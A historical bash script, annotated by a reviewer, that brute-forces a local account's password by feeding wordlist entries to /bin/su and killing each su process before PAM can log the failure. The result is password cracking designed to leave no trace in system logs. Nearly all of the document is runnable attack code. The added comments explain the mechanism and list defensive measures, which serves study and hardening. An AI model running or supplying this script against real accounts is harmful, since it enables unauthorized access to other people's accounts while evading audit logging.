#!/bin/bash
# (c) 1999/2000
# ------------------------------
#
# Requirements:
#
# - working /bin/su
# - recent PAM implementation (tested with RedHat 5.x)
# - 'usleep' command and bash 1.14.x or 2.0.x
#
# Reviewer summary (for readers studying this listing):
#   Historical local password-guessing script. For every line of a wordfile it
#   starts /bin/su against one account with the candidate on stdin, waits a
#   fixed interval, then SIGKILLs su. If the kill fails because su has already
#   gone, the script reports that candidate as the password.
#   NOTE(review): the banner's "NothingInLogs" claim presumably rests on su/PAM
#   pausing after a failed authentication and writing the failure record only
#   after that pause, so a su killed inside the pause leaves no entry. That
#   behaviour is not visible in this listing; confirm against the PAM version
#   in use.
#   Defensive takeaways: record the failed attempt before any failure delay,
#   limit who may invoke su (for example with pam_wheel), and treat a burst of
#   short-lived su processes killed by the same unprivileged uid as a signal
#   worth alerting on.
#
DESTACC='testy' # Account to crack
WORDFILE='words' # Wordfile with passwords to test
KILLDELAY=03 # Delay (in 1/10 sec) to wait for su (<10)
# End of setup.

clear
echo "RedHat - NothingInLogs[tm] BruteForce(R) Password Crack"
echo "-------------------------------------------------------"
echo " - (c) 1999/2000, Michal Zalewski - "
echo

# Optional first argument overrides the configured account name.
if [ ! "$1" = "" ]; then
  DESTACC="$1"
fi

# Convert tenths of a second into microseconds for usleep.
# $[ ... ] is the old bash arithmetic form, equivalent to $(( ... )).
KD=$[KILLDELAY*100000]

echo "[+] Configured against user '$DESTACC', wordfile: $WORDFILE"
echo "[+] Kill-delay set to $KD usecs..."

# Pre-flight checks. Every failure path below prints a message and exits with
# status 0, so a caller cannot tell failure from success by exit code.

# The account must be resolvable by id(1).
id "$DESTACC" &>/dev/null
if [ ! "$?" = "0" ]; then
  echo "[-] Hmm, user '$DESTACC' not found, paranoia?"
  echo
  exit 0
fi

# Login shell is field 7 of the matching /etc/passwd line. Only the local
# passwd file is consulted; a non-bash shell produces a warning, not an exit.
SHL="`grep "^$DESTACC:" /etc/passwd|awk -F: '{print $7}'`"
if [ ! "$SHL" = "/bin/bash" ]; then
  echo "[-] Hmm, user '$DESTACC' has $SHL set as shell, expect problems..."
fi
echo "[+] Destination account is alive and well..."

if [ ! -f "$WORDFILE" ]; then
  echo "[-] Wordfile '$WORDFILE' not found, check it."
  echo
  exit 0
fi

# /bin/su must carry the setuid bit and be executable by the caller.
if [ ! -u /bin/su ]; then
  echo "[-] Can't find +s on /bin/su, hack me."
  echo
  exit 0
fi
if [ ! -x /bin/su ]; then
  echo "[-] Haven't +x on /bin/su, hack me."
  echo
  exit 0
fi
echo "[+] /bin/su seems to be executable and setuid, hopefully it works..."

if [ ! -x /bin/usleep ]; then
  echo "[-] No /bin/usleep in this system. Be a hacker."
  echo
  exit 0
fi

# Refuses to run as uid 0.
# NOTE(review): presumably because su does not prompt root for a password,
# which would make every attempt look like a match - confirm.
if [ "$UID" = "0" ]; then
  echo "[-] Root?! You idiot..."
  echo
  exit 0
fi

echo "[+] Let's go straight to number one..."

# LNS = number of lines in the wordfile; CNT = 1-based index of the current line.
LNS="`cat $WORDFILE | wc -l|awk '{print $1}'`"
CNT=0
echo "[+] Wordfile '$WORDFILE' loaded - $LNS passwords..."
echo "[+] Estimated time: $[LNS*KILLDELAY/25] secs, max: $[LNS*KILLDELAY/10] secs."

# Main loop: one su invocation per wordfile line.
while [ "$CNT" -lt "$LNS" ]; do
  CNT=$[CNT+1]
  # Re-reads the wordfile on every pass and keeps only line number CNT.
  PASS="`head -$CNT $WORDFILE|tail -1`"
  # Progress line. The string spans two physical lines in this listing;
  # NOTE(review): the embedded newline looks like an extraction artifact of
  # padding before the carriage return - confirm against the original file.
  echo -ne "[?] Trying '$PASS' ($CNT/$LNS)... 
\r"
  # The pipeline runs in the background; $! below is the PID of its last
  # command, i.e. su.
  echo "$PASS" | su "$DESTACC" &>/dev/null &
  usleep $KD
  # SIGKILL cannot be caught, so su gets no chance to run any cleanup of its own.
  kill -9 $! &>/dev/null
  # A non-zero status from kill means the PID was already gone. The script
  # treats that as "su accepted the password"; it is a timing heuristic only,
  # since su exiting early for any other reason is reported the same way.
  if [ ! "$?" = "0" ]; then
    echo
    echo "[*] Huh, it worked. I've tried password '$PASS' for '$DESTACC'."
    echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds."
    echo "[+] Thank You, and hope you enjoyed your stay."
    echo
    exit 0
  fi
done

# Wordfile exhausted without any su instance exiting inside the kill delay.
echo "[*] Hmm, end of wordfile, but no matching passwords :("
echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds."
echo "[+] Bad day, try again tomorrow?"
echo
exit 0